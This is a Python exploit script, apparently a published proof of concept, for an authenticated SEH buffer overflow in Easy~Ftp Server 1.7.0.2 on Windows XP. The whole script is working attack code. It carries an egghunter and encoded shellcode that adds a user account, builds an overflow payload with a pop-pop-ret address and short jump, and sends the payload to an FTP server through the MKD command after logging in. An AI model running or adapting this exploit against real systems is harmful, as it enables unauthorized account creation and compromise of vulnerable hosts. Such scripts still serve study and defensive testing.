#!/usr/bin/python # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF # Original Author: dookie2000ca || Windows XP SP3 Professional # Author: b33f # Windows XP Home SP1 # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip import socket import sys #------------------------------------------------------------------------------- #SE Handler is overwritten - offset to SEH 256 #short jump \xEB\x07 #pop pop ret rpcrt4.dll 78011926 #badchars 0x00 0x0a 0x2f 0x5c #------------------------------------------------------------------------------- bunny = ( "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74" # egghunter marker w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") #win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai shellcode = ( "\xdb\xd3\x31\xc9\xb8\x5d\x82\xf8\x52\xb1\x34\xd9\x74\x24\xf4\x5f" "\x83\xc7\x04\x31\x47\x13\x03\x1a\x91\x1a\xa7\x58\x7d\x9e\x48\xa0" "\x7e\x94\x0c\x9c\xf5\xd6\x8b\xa4\x08\xc8\x1f\x1b\x13\x9d\x7f\x83" "\x22\x4a\x36\x48\x10\x07\xc8\xa0\x68\xd7\x52\x90\x0f\x17\x10\xef" "\xce\x52\xd4\xee\x12\x89\x13\xcb\xc6\x6a\xd8\x5e\x02\xf9\xbf\x84" "\xcd\x15\x59\x4f\xc1\xa2\x2d\x10\xc6\x35\xd9\x25\xea\xbe\x1c\xd2" "\x9a\x9d\x3a\x20\x5e\x2c\x83\x4c\xeb\x0f\x33\x09\x2b\xf7\x3f\x9a" "\xec\x04\xcb\xec\xf0\xb9\x40\x64\x01\x29\x5f\xff\x91\x1d\x60\xff" "\x91\xd6\x09\xc3\xce\xd9\x3f\x5b\xa7\x90\x38\x18\x87\xd8\xe8\x76" "\xf8\x95\x0d\xd9\x90\x31\xf3\x6f\x6e\x15\xf3\x88\x0c\xf4\x6f\x78" "\xb6\x7e\x15\xa4\x17\x1c\xf5\xca\x02\x96\xd5\x67\xbe\x33\x64\xa7" "\x26\xc9\xeb\xcc\x86\x44\xcc\x3d\x86\xe2\x48\x61\x2e\xcd\x70\x0f" "\x4b\x65\x51\xa3\xfc\xe6\xf0\x57\x64\x9b\x9d\xd2\x1a\x7b\x23\x78" "\xb6\x12\xcd\xe9\x3b\x91\x63\x88\xcf\x36\xf6\x39\x10\xaf\x83\xde" "\x3b\x0f\x43\x61\xf8\x0b\x9b") payload = "A"*7 + "w00tw00t" + shellcode + "A"*10 + "\xEB\x07\x90\x90" + "\x26\x19\x01\x78" + "\x90"*25 + bunny + "A"*133 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.70',21)) s.recv(1024) s.send('USER b33f\r\n') s.recv(1024) s.send('PASS b33f\r\n') s.recv(1024) s.send('MKD ' + payload + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close